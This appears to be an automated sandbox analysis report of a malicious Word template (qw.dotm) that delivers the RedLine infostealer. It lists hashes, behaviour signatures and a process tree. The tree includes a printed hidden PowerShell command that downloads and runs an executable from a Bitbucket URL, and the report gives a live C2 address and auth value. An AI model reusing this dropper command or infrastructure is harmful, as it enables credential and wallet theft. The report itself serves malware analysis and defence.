Overview

overview

10

Static

static

8

qw.dotm

windows7-x64

10

qw.dotm

windows10-2004-x64

10

Analysis

  • max time kernel
    102s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2022 12:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    qw.dotm

  • Size

    15KB

  • MD5

    19cd6fd29ed067257e00f015b95f06b6

  • SHA1

    76f46883574ac1e0b2c831ae4e15f2b786f663c3

  • SHA256

    4a10e8fcc6e942f08c066c542cec8a4e2c1459c8d901e60cf6f7b74f0c032ec1

  • SHA512

    4c28d8214a5e7b7a1f2f1feffc3ea06977aa7059c854a93248835727a106e01c12727101b22a320edf576c7d919674cd12e083be90f041cd5f1278af06bf7c01

  • SSDEEP

    384:tmtZYh+oI+lpKrkjq2C781DXd6akwLWdxdkYB3to:qloI+lAx8Wakw6Lxk

Score
10/10
redline23/12/2022infostealerspyware

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://bitbucket.org/bitcryptoexchangeee/1/downloads/driver.exe

Extracted

Family

redline

Botnet

23/12/2022

C2

45.138.27.123:31889

Attributes
  • auth_value

    50fd3920486b0eae99d8c0feb8010929

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qw.dotm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/bitcryptoexchangeee/1/downloads/driver.exe','2d21412.exe');Start-Process '2d21412.exe'
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Users\Admin\AppData\Local\Temp\2d21412.exe
        "C:\Users\Admin\AppData\Local\Temp\2d21412.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:1424
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1760

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\2d21412.exe
    Filesize

    200KB

    MD5

    f2bd768066b4581da1f4c6ae3b82cf35

    SHA1

    2fbe84052bae89d230529d9a82f781bb156f6bc5

    SHA256

    4a3e358896e47f6106a459f130af00a37970be4439f231079f0d553b1f15e3fa

    SHA512

    4f46f7e4e1b5270d84589081470ed37b29a4b020daf586c9381927e330f0ae18606c43ba5a28b0bd40c4601262167ebd805a19af0fb49eca5a3198056ae954ff

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\2d21412.exe
    Filesize

    200KB

    MD5

    f2bd768066b4581da1f4c6ae3b82cf35

    SHA1

    2fbe84052bae89d230529d9a82f781bb156f6bc5

    SHA256

    4a3e358896e47f6106a459f130af00a37970be4439f231079f0d553b1f15e3fa

    SHA512

    4f46f7e4e1b5270d84589081470ed37b29a4b020daf586c9381927e330f0ae18606c43ba5a28b0bd40c4601262167ebd805a19af0fb49eca5a3198056ae954ff

    Download Submit

  • memory/1012-138-0x00007FFAF22E0000-0x00007FFAF22F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-135-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-136-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-137-0x00007FFAF22E0000-0x00007FFAF22F0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-132-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-165-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-164-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-163-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-134-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-133-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1012-162-0x00007FFAF4C10000-0x00007FFAF4C20000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1424-146-0x00000000005F0000-0x0000000000628000-memory.dmp

    Filesize

    224KB

    Download

  • memory/1760-157-0x00000000072F0000-0x00000000074B2000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/1760-150-0x00000000053F0000-0x0000000005A08000-memory.dmp

    Filesize

    6.1MB

    Download

  • memory/1760-151-0x0000000004EE0000-0x0000000004FEA000-memory.dmp

    Filesize

    1.0MB

    Download

  • memory/1760-152-0x0000000004DF0000-0x0000000004E02000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1760-153-0x0000000004E60000-0x0000000004E9C000-memory.dmp

    Filesize

    240KB

    Download

  • memory/1760-154-0x0000000005180000-0x0000000005212000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1760-155-0x0000000005FC0000-0x0000000006564000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1760-156-0x0000000005A10000-0x0000000005A76000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1760-149-0x0000000000390000-0x00000000003C2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1760-158-0x00000000079F0000-0x0000000007F1C000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/1760-159-0x0000000006720000-0x0000000006796000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1760-160-0x00000000067A0000-0x00000000067F0000-memory.dmp

    Filesize

    320KB

    Download

  • memory/2236-145-0x00007FFB089F0000-0x00007FFB094B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2236-141-0x00007FFB089F0000-0x00007FFB094B1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2236-140-0x000001BFC1420000-0x000001BFC1442000-memory.dmp

    Filesize

    136KB

    Download